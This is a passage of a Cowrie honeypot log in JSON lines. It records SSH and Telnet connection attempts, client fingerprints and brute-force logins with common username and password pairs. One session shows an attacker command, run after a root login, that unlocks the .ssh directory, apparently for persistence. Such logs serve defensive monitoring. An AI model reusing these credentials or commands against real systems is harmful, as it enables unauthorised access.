nssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T11:03:11.320048Z","src_ip":"27.112.79.123","session":"3fe36c77c7d6"}
{"eventid":"cowrie.login.failed","username":"python","password":"123456","message":"login attempt [python/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T11:03:12.441337Z","src_ip":"27.112.79.123","session":"3fe36c77c7d6"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:03:13.711538Z","src_ip":"27.112.79.123","session":"3fe36c77c7d6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60918,"dst_ip":"1.2.3.4","dst_port":22,"session":"7c0652856716","protocol":"ssh","message":"New connection: 212.227.235.229:60918 (1.2.3.4:22) [session: 7c0652856716]","sensor":"my-vps","timestamp":"2025-08-28T11:03:25.667504Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T11:03:25.668459Z","src_ip":"212.227.235.229","session":"7c0652856716"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T11:03:25.914494Z","src_ip":"212.227.235.229","session":"7c0652856716"}
{"eventid":"cowrie.login.success","username":"root","password":"QWEqaz123!@#","message":"login attempt [root/QWEqaz123!@#] succeeded","sensor":"my-vps","timestamp":"2025-08-28T11:03:26.921187Z","src_ip":"212.227.235.229","session":"7c0652856716"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T11:03:28.005329Z","src_ip":"212.227.235.229","session":"7c0652856716"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T11:03:28.006243Z","src_ip":"212.227.235.229","session":"7c0652856716"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T11:03:28.007525Z","src_ip":"212.227.235.229","session":"7c0652856716"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48528,"dst_ip":"1.2.3.4","dst_port":22,"session":"08fd7a839261","protocol":"ssh","message":"New connection: 212.227.235.229:48528 (1.2.3.4:22) [session: 08fd7a839261]","sensor":"my-vps","timestamp":"2025-08-28T11:03:57.459078Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T11:03:57.460156Z","src_ip":"212.227.235.229","session":"08fd7a839261"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T11:03:57.713154Z","src_ip":"212.227.235.229","session":"08fd7a839261"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:04:05.459126Z","src_ip":"212.227.235.229","session":"08fd7a839261"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":45052,"dst_ip":"1.2.3.4","dst_port":22,"session":"5792e40cbfd8","protocol":"ssh","message":"New connection: 212.227.125.160:45052 (1.2.3.4:22) [session: 5792e40cbfd8]","sensor":"my-vps","timestamp":"2025-08-28T11:04:22.281467Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T11:04:22.282500Z","src_ip":"212.227.125.160","session":"5792e40cbfd8"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-28T11:04:22.341986Z","src_ip":"212.227.125.160","session":"5792e40cbfd8"}
{"eventid":"cowrie.login.failed","username":"solana","password":"solana","message":"login attempt [solana/solana] failed","sensor":"my-vps","timestamp":"2025-08-28T11:04:22.523640Z","src_ip":"212.227.125.160","session":"5792e40cbfd8"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:04:23.585226Z","src_ip":"212.227.125.160","session":"5792e40cbfd8"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.79.123","src_port":51776,"dst_ip":"1.2.3.4","dst_port":22,"session":"6eb09b08de19","protocol":"ssh","message":"New connection: 27.112.79.123:51776 (1.2.3.4:22) [session: 6eb09b08de19]","sensor":"my-vps","timestamp":"2025-08-28T11:04:28.705342Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T11:04:28.706302Z","src_ip":"27.112.79.123","session":"6eb09b08de19"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T11:04:28.977308Z","src_ip":"27.112.79.123","session":"6eb09b08de19"}
{"eventid":"cowrie.login.failed","username":"suporte","password":"12345678","message":"login attempt [suporte/12345678] failed","sensor":"my-vps","timestamp":"2025-08-28T11:04:30.077218Z","src_ip":"27.112.79.123","session":"6eb09b08de19"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:04:31.350065Z","src_ip":"27.112.79.123","session":"6eb09b08de19"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":53396,"dst_ip":"1.2.3.4","dst_port":22,"session":"cad1bc1a7585","protocol":"ssh","message":"New connection: 217.72.205.35:53396 (1.2.3.4:22) [session: cad1bc1a7585]","sensor":"my-vps","timestamp":"2025-08-28T11:04:35.416419Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:04:35.418332Z","src_ip":"217.72.205.35","session":"cad1bc1a7585"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35840,"dst_ip":"1.2.3.4","dst_port":22,"session":"4199073be628","protocol":"ssh","message":"New connection: 212.227.235.229:35840 (1.2.3.4:22) [session: 4199073be628]","sensor":"my-vps","timestamp":"2025-08-28T11:04:57.740577Z"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:04:57.918311Z","src_ip":"212.227.235.229","session":"4199073be628"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35854,"dst_ip":"1.2.3.4","dst_port":22,"session":"76dc856a08f3","protocol":"ssh","message":"New connection: 212.227.235.229:35854 (1.2.3.4:22) [session: 76dc856a08f3]","sensor":"my-vps","timestamp":"2025-08-28T11:04:58.095447Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T11:04:58.096238Z","src_ip":"212.227.235.229","session":"76dc856a08f3"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T11:04:58.856230Z","src_ip":"212.227.235.229","session":"76dc856a08f3"}
{"eventid":"cowrie.login.failed","username":"cyrus","password":"cyrus1","message":"login attempt [cyrus/cyrus1] failed","sensor":"my-vps","timestamp":"2025-08-28T11:04:59.956716Z","src_ip":"212.227.235.229","session":"76dc856a08f3"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:05:01.137216Z","src_ip":"212.227.235.229","session":"76dc856a08f3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46854,"dst_ip":"1.2.3.4","dst_port":22,"session":"fe50ebf5aa97","protocol":"ssh","message":"New connection: 212.227.235.229:46854 (1.2.3.4:22) [session: fe50ebf5aa97]","sensor":"my-vps","timestamp":"2025-08-28T11:05:10.448416Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T11:05:10.979835Z","src_ip":"212.227.235.229","session":"fe50ebf5aa97"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T11:05:11.228582Z","src_ip":"212.227.235.229","session":"fe50ebf5aa97"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49304,"dst_ip":"1.2.3.4","dst_port":23,"session":"22b3f388c0c6","protocol":"telnet","message":"New connection: 212.227.235.229:49304 (1.2.3.4:23) [session: 22b3f388c0c6]","sensor":"my-vps","timestamp":"2025-08-28T11:05:28.574829Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45154,"dst_ip":"1.2.3.4","dst_port":22,"session":"042cda2a4d26","protocol":"ssh","message":"New connection: 212.227.235.229:45154 (1.2.3.4:22) [session: 042cda2a4d26]","sensor":"my-vps","timestamp":"2025-08-28T11:05:32.362864Z"}
{"eventid":"cowrie.session.closed","duration":14.00851583480835,"message":"Connection lost after 14 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:05:42.583265Z","src_ip":"212.227.235.229","session":"22b3f388c0c6"}
{"eventid":"cowrie.session.closed","duration":"10.9","message":"Connection lost after 10.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:05:43.270576Z","src_ip":"212.227.235.229","session":"042cda2a4d26"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.79.123","src_port":59922,"dst_ip":"1.2.3.4","dst_port":22,"session":"78e11a93d76d","protocol":"ssh","message":"New connection: 27.112.79.123:59922 (1.2.3.4:22) [session: 78e11a93d76d]","sensor":"my-vps","timestamp":"2025-08-28T11:05:43.271800Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T11:05:43.272315Z","src_ip":"27.112.79.123","session":"78e11a93d76d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T11:05:43.542846Z","src_ip":"27.112.79.123","session":"78e11a93d76d"}
{"eventid":"cowrie.login.failed","username":"guest","password":"1234","message":"login attempt [guest/1234] failed","sensor":"my-vps","timestamp":"2025-08-28T11:05:44.667951Z","src_ip":"27.112.79.123","session":"78e11a93d76d"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:05:45.940166Z","src_ip":"27.112.79.123","session":"78e11a93d76d"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.79.123","src_port":59654,"dst_ip":"1.2.3.4","dst_port":22,"session":"195834cab81a","protocol":"ssh","message":"New connection: 27.112.79.123:59654 (1.2.3.4:22) [session: 195834cab81a]","sensor":"my-vps","timestamp":"2025-08-28T11:06:56.270380Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T11:06:56.271550Z","src_ip":"27.112.79.123","session":"195834cab81a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T11:06:56.541079Z","src_ip":"27.112.79.123","session":"195834cab81a"}
{"eventid":"cowrie.login.failed","username":"user2","password":"test","message":"login attempt [user2/test] failed","sensor":"my-vps","timestamp":"2025-08-28T11:06:57.676885Z","src_ip":"27.112.79.123","session":"195834cab81a"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:06:58.948734Z","src_ip":"27.112.79.123","session":"195834cab81a"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:07:10.461798Z","src_ip":"212.227.235.229","session":"fe50ebf5aa97"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55664,"dst_ip":"1.2.3.4","dst_port":22,"session":"246c9f0ba476","protocol":"ssh","message":"New connection: 212.227.235.229:55664 (1.2.3.4:22) [session: 246c9f0ba476]","sensor":"my-vps","timestamp":"2025-08-28T11:07:27.192488Z"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:07:27.424909Z","src_ip":"212.227.235.229","session":"246c9f0ba476"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.79.123","src_port":57642,"dst_ip":"1.2.3.4","dst_port":22,"session":"29c64a4bb8ce","protocol":"ssh","message":"New connection: 27.112.79.123:57642 (1.2.3.4:22) [session: 29c64a4bb8ce]","sensor":"my-vps","timestamp":"2025-08-28T11:08:08.851801Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T11:08:08.852740Z","src_ip":"27.112.79.123","session":"29c64a4bb8ce"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T11:08:09.123227Z","src_ip":"27.112.79.123","session":"29c64a4bb8ce"}
{"eventid":"cowrie.login.failed","username":"steam","password":"1q2w3e","message":"login attempt [steam/1q2w3e] failed","sensor":"my-vps","timestamp":"2025-08-28T11:08:10.245297Z","src_ip":"27.112.79.123","session":"29c64a4bb8ce"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:08:11.517713Z","src_ip":"27.112.79.123","session":"29c64a4bb8ce"}
